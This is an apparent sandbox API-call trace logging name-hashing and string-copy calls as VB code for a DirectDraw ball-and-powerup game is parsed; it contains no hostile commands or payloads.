0x10b0e3 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedY") returned 0x101cda [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.261] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedX") returned 0x101cdd [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RatioX") returned 0x10b0e3 [0030.262] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="RatioX" | out: _Dst="RatioX") returned 0x0 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RatioX") returned 0x10b0e3 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RatioY") returned 0x10b0e0 [0030.262] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="RatioY" | out: _Dst="RatioY") returned 0x0 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RatioY") returned 0x10b0e0 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedX") returned 0x101cdd [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedX") returned 0x101cdd [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BSpeedX") returned 0x101cdd [0030.262] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RatioX") returned 0x10b0e3 [0030.262] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="NewX" | out: _Dst="NewX") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="NewY" | out: _Dst="NewY") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="SgnX" | out: _Dst="SgnX") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="SgnY" | out: _Dst="SgnY") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="SgnX" | out: _Dst="SgnX") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="NewX" | out: _Dst="NewX") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="SgnX" | out: _Dst="SgnX") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="NewX" | out: _Dst="NewX") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="SgnY" | out: _Dst="SgnY") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="NewY" | out: _Dst="NewY") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="SgnY" | out: _Dst="SgnY") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="D" | out: _Dst="D") returned 0x0 [0030.263] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.264] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.264] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="NewY" | out: _Dst="NewY") returned 0x0 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BallX") returned 0x10e49a [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewX") returned 0x100975 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BallY") returned 0x10e497 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewY") returned 0x100972 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.264] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WeaponT") returned 0x10e418 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ouch") returned 0x1021d4 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewX") returned 0x100975 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewY") returned 0x100972 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.264] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewX") returned 0x100975 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.264] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewY") returned 0x100972 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.264] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeX") returned 0x10b35c [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.264] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MeY") returned 0x10b359 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.264] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ry") returned 0x105f04 [0030.264] CExposedStream::Read () returned 0x0 [0030.264] CExposedStream::Read () returned 0x0 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bottom") returned 0x107b48 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rx") returned 0x105f07 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UniB") returned 0x109f6f [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="all") returned 0x107427 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Color") returned 0x104632 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.265] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.265] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.265] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Top") returned 0x10da35 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.266] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="xt" | out: _Dst="xt") returned 0x0 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ResX") returned 0x101fbd [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ResX") returned 0x101fbd [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ResX") returned 0x101fbd [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ResX") returned 0x101fbd [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.266] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="yt" | out: _Dst="yt") returned 0x0 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ResY") returned 0x101fba [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bottom") returned 0x107b48 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuf") returned 0x100fea [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bottom") returned 0x107b48 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ResY") returned 0x101fba [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ResY") returned 0x101fba [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ResY") returned 0x101fba [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BackBuffer") returned 0x102e9b [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BltFast") returned 0x107839 [0030.266] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="xt") returned 0x105fe1 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="yt") returned 0x105f72 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DirectDraw_NavBar") returned 0x10f8bf [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DDBLTFAST_WAIT") returned 0x108122 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DDBLTFAST_SRCCOLORKEY") returned 0x100057 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimPowerup") returned 0x108b62 [0030.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52192, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0030.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a52192, cbMultiByte=11, lpWideCharStr=0x766cf98, cchWideChar=11 | out: lpWideCharStr="AnimPowerup") returned 11 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.267] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="rBuff" | out: _Dst="rBuff") returned 0x0 [0030.267] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="rBuff" | out: _Dst="rBuff") returned 0x0 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBuff") returned 0x10f802 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExX") returned 0x108b53 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExY") returned 0x108b50 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewGTC") returned 0x101eef [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerFrameT") returned 0x108d29 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerFrame") returned 0x105bf1 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerFrame") returned 0x105bf1 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.267] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerUp") returned 0x10e2b1 [0030.267] VirtualAlloc (lpAddress=0x67e1000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x67e1000 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerFrame") returned 0x105bf1 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerFrame") returned 0x105bf1 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerFrame") returned 0x105bf1 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerFrame") returned 0x105bf1 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerFrameT") returned 0x108d29 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewGTC") returned 0x101eef [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerEffect") returned 0x1050d3 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewGTC") returned 0x101eef [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerTick") returned 0x10000f [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.268] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerTick") returned 0x10000f [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewGTC") returned 0x101eef [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerEffect") returned 0x1050d3 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerEffect") returned 0x1050d3 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewGTC") returned 0x101eef [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerTick") returned 0x10000f [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerTick") returned 0x10000f [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewGTC") returned 0x101eef [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerEffect") returned 0x1050d3 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pwr") returned 0x10c5d6 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExX") returned 0x108b53 [0030.269] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="ExX" | out: _Dst="ExX") returned 0x0 [0030.269] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PowerX") returned 0x10f4bb [0030.269] 